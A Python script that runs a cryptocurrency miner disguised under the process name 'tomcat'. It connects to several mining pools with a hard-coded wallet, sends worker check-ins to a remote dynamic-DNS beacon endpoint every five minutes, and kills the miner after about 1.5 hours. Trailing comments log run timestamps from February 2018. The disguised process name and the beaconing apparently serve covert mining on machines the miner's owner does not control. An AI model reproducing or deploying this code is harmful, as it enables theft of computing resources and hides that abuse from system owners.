import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:05.324440
#2018-02-17 16:18:04.864286
#2018-02-17 18:05:05.404056
#2018-02-17 19:54:01.342455
#2018-02-17 21:42:01.919461
#2018-02-17 23:25:07.640841
#2018-02-18 01:14:06.995443
#2018-02-18 03:02:01.728675
#2018-02-18 04:49:04.380339
#2018-02-18 06:40:02.027606
#2018-02-18 08:28:07.452739
#2018-02-18 10:16:04.889462
#2018-02-18 12:02:06.050252
#2018-02-18 13:47:06.151435
#2018-02-18 15:39:06.572544
#2018-02-18 17:28:04.495339
#2018-02-18 19:16:01.340985
#2018-02-18 21:02:06.007154
#2018-02-18 22:48:05.370550
#2018-02-19 00:36:03.853337
#2018-02-19 02:22:04.946490
#2018-02-19 04:09:06.215645
#2018-02-19 05:53:06.106729
#2018-02-19 07:41:07.535696
#2018-02-19 09:31:04.043579
#2018-02-19 11:21:09.161569
#2018-02-19 13:08:07.709525
#2018-02-19 14:56:08.950788
#2018-02-19 16:43:07.355483
#2018-02-19 18:29:06.437652
#2018-02-19 20:16:08.356659
#2018-02-19 22:05:07.244494
#2018-02-19 23:50:10.371287
#2018-02-20 01:37:04.524745
#2018-02-20 03:25:02.938883
#2018-02-20 05:11:06.337349
#2018-02-20 06:53:07.061656
#2018-02-20 08:39:07.000250
#2018-02-20 10:23:05.040053
#2018-02-20 12:08:01.820990
#2018-02-20 13:57:07.718643
#2018-02-20 15:40:01.276342
#2018-02-20 17:24:02.212285
#2018-02-20 19:13:05.421232
#2018-02-20 21:02:06.595618
#2018-02-20 22:49:04.171009
#2018-02-21 00:31:08.276325
#2018-02-21 02:18:05.942412
#2018-02-21 04:05:01.636250
#2018-02-21 05:51:07.488812
#2018-02-21 07:40:09.774182
#2018-02-21 09:25:03.197275
#2018-02-21 11:13:07.093132
#2018-02-21 13:02:11.559911
#2018-02-21 14:51:11.353108
#2018-02-21 16:41:10.805170
#2018-02-21 18:32:02.228012
#2018-02-21 20:16:05.678882
#2018-02-21 22:03:08.127987
#2018-02-21 23:50:07.658810
#2018-02-22 01:40:03.430114
#2018-02-22 03:28:07.984108
#2018-02-22 05:15:01.614800
#2018-02-22 06:58:05.942044
#2018-02-22 08:45:10.005208
#2018-02-22 10:33:01.810980
#2018-02-22 12:18:02.079617
#2018-02-22 14:02:02.181010
#2018-02-22 15:49:12.941140
#2018-02-22 17:35:08.404748
#2018-02-22 19:21:08.187108
#2018-02-22 21:12:06.118364
#2018-02-22 22:57:04.135382
#2018-02-23 00:43:05.846925
#2018-02-23 02:31:06.342591
#2018-02-23 04:20:08.064898
#2018-02-23 06:06:01.738913
#2018-02-23 07:52:02.230758
#2018-02-23 10:07:05.000069
#2018-02-23 12:02:07.205714
#2018-02-23 13:51:11.685031
#2018-02-23 15:44:09.469086
#2018-02-23 17:30:11.520402
#2018-02-23 19:17:01.330976
#2018-02-23 21:01:07.025022
#2018-02-23 22:45:08.731051
#2018-02-24 00:32:05.685664
#2018-02-24 02:23:06.509869
#2018-02-24 04:14:07.772227
#2018-02-24 06:02:02.032664
#2018-02-24 07:49:05.332836
#2018-02-24 09:28:06.306029
#2018-02-24 11:22:05.631435
#2018-02-24 13:11:05.330809
#2018-02-24 15:01:02.249920
#2018-02-24 16:51:04.285328
#2018-02-24 18:39:06.012190
#2018-02-24 20:30:08.788530
#2018-02-24 22:28:04.364085
#2018-02-25 01:38:03.787991
#2018-02-25 05:07:03.814688
#2018-02-25 10:16:02.011524